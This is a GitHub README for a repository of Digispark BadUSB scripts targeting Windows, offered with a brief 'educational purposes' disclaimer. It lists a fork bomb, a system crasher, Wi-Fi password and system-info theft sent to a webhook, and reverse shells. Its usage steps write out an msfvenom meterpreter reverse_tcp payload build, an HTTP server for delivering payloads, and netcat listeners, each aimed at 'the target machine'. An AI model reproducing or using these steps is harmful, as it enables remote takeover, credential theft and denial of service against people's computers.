Skip to content

EndlssNightmare/Digispark-scripts

Repository files navigation

💀Digispark Attiny85 Scripts for Windows💀


This repository focuses on the storage of scripts for the digispark and for the dissemination of knowledge. I will update over time as I gain more experience! :)

Obs: These scripts are for educational purposes only. Use them at your own risk!

Works with Windows, Linux and Termux!



Preview


  • Fakeupdate :trollface:
  • ForkBomb 💥
  • Grab-WindowsSysinfo 👽
  • Metasploit-Revshell 💔
  • Netcat-Revshell 🐱
  • Revshell-ps1 🐀
  • Steal-Wifi-Passwd 😈
  • Wallpaper-Prank 😵
  • Windows-Crasher 💥

Dependences


Digistump packages: DigistumpArduino

Digispark ABNT2: DigisparkABNT2

Arduino IDE: ArduinoIDE

Metasploit Framework: Metasploit Framework


How to use


  1. Fakeupdate

  2. This Fakeupdate script opens a fake Windows update website and is configured to be full screen.


    Upload the "Fakeupdate" script to digispark and run it on the target machine.


  3. ForkBomb

  4. This Fork Bomb script will repeat itself until the pc freezes or crashes.


    Upload the "Fork Bomb" script to digispark and run it.


  5. Grab-WindowsSysinfo

  6. Copy and pase your WebHook link on the digispark script.


    Upload the "Grab-WindowsSysinfo" script to digispark and run it on the target machine.


  7. Metasploit-Revshell

  8. Create your own metasploitable file:


    msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=YOURIP lport=443 -e x86/shikata_ga_nai -i 7 -f exe -o exploit.exe
    

    Edit the meta.rc file and run the msfconsole:


    msfdb reinit && msfconsole -r meta.rc
    

    Set your http request on the script (http://yourip/exploit.exe) and listen on your host:


    python3 -m http.server 80
    

    Upload the "Metasploit-Revshell" script to digispark and run it on the target machine.


  9. Netcat-Revshell

  10. Set your http server to download NetCat on victim's machine:


    python3 -m http.server 80
    

    Listen to the port:


    nc -lvnp 443 // ncat -lvnp 443 // pwncat-cs -lp 443
    

    Upload the "Netcat-Revshell" script to digispark and run it on the target machine.


  11. Revshell-ps1

  12. Save the .ps1 script on your own secret gist repository, copy and paste the raw link on the Arduino IDE.


    Listen to the port:


    nc -lvnp 443 // ncat -lvnp 443 // pwncat-cs -lp 443
    

    Upload the "Revshell-ps1" script to digispark and run it on the target machine.


  13. Steal-Wifi-Passwd

  14. Copy and pase your WebHook link on the digispark script.


    Upload the "Steal-Wifi-Passwd" script to digispark and run it on the target machine.


  15. Wallpaper-Prank

  16. This Wallpaper Prank script takes a picture of the desktop, saves it as the background and hides all the icons.


    Upload the "Wallpaper-Prank" script to digispark and run it on the target machine.


  17. Windows-Crasher

  18. This Windows Crasher script creates a .bat payload on the temporary dir and crashes de Windows.


    Upload the "Windows-Crasher" script to digispark and run it on the target machine.


References and Credits


CedArctic

Brunomlima

Gadotti